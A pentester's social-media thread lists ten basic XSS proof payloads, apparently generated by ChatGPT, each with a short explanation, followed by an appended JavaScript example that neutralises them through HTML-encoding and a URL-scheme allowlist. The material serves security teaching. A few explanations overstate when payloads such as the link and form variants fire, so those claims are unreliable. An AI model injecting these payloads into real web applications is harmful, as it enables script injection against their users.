10 XSS Payloads for Different Scenarios - #AppSecwithAI

3 years ago

#AppSecwithAI Look what ChatGPT generated when I asked it to give me 10 XSS payloads for different scenarios - 🧵 ↓
1/10: `<svg/onload=alert(1)>` - This payload uses an SVG element with an onload event handler to trigger the XSS payload.
2/10: `<img/src=x onerror=alert(1)>` - This payload uses the onerror event handler to trigger the XSS payload when the image source is invalid.
3/10: `<img/src=x onerror=confirm(1)>` - This payload uses the onerror event handler to trigger a confirm box with the XSS payload when the image source is invalid.
4/10: `<form/action=javascript:alert(1)>` - This payload uses the action attribute of a form element to trigger the XSS payload.
5/10: `<input/onfocus=alert(1)>` - This payload uses the onfocus event handler to trigger the XSS payload when the input field is focused.
6/10: `<body/onload=alert(1)>` - This payload uses the onload event handler to trigger the XSS payload when the page loads.
7/10: `<link/href=javascript:alert(1)>` - This payload uses the href attribute of a link element to trigger the XSS payload.
8/10: `<script/src=data:text/javascript,alert(1)>` - This payload uses the src attribute of a script element to trigger the XSS payload with a data URI.
9/10: `<b/onmouseover=alert(1)>` - This payload uses the onmouseover event handler to trigger the XSS payload when the mouse is over the element.
10/10: `<a/href='javascript:alert(1)'>` - This payload uses the href attribute of an anchor element to trigger the XSS payload.
It's worth noting that these payloads are for educational purposes only.
Harsh Bothra

@harshbothra_

Freelance Pentester & Consultant • Cobalt Core Lead & Pentester • Author • Speaker • Blogger • SecurityExplained • Project Bheem • Learn365 • Views are personal
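
The defensive counterpart to the ten strings in the thread, as an added example that is not part of the original thread or of ChatGPT's output: HTML-encoding neutralises all ten when they are rendered as text, while the `javascript:` and `data:` values in 4, 7, 8 and 10 additionally need a scheme allowlist wherever user input becomes a URL attribute. The function names, the allowlist and the `https://app.example/` base URL are assumptions made for illustration.

```javascript
// Added example; escapeHtml, safeUrl, renderLink and encodeAll are hypothetical names.

// The ten strings exactly as listed in the thread, used here as test input.
const PAYLOADS = [
  '<svg/onload=alert(1)>', '<img/src=x onerror=alert(1)>',
  '<img/src=x onerror=confirm(1)>', '<form/action=javascript:alert(1)>',
  '<input/onfocus=alert(1)>', '<body/onload=alert(1)>',
  '<link/href=javascript:alert(1)>',
  '<script/src=data:text/javascript,alert(1)>',
  '<b/onmouseover=alert(1)>', "<a/href='javascript:alert(1)'>",
];

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode untrusted text for an HTML element body or a quoted attribute value.
// With "<" and ">" encoded, none of the ten strings can open a tag.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Encoding alone does not help when the untrusted value *is* the URL:
// "javascript:alert(1)" contains nothing to encode. Allowlist the scheme.
// The WHATWG URL parser normalises the scheme the same way a browser does.
const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']); // assumed policy
function safeUrl(value) {
  try {
    const parsed = new URL(String(value), 'https://app.example/'); // assumed base
    return ALLOWED_SCHEMES.has(parsed.protocol) ? String(value) : '#';
  } catch {
    return '#'; // unparseable input is rejected, not passed through
  }
}

// Both controls together: scheme check on the URL, encoding on every value.
function renderLink(url, label) {
  return `<a href="${escapeHtml(safeUrl(url))}">${escapeHtml(label)}</a>`;
}

// Every thread string after encoding, for inspection or logging.
function encodeAll() {
  return PAYLOADS.map(escapeHtml);
}
```
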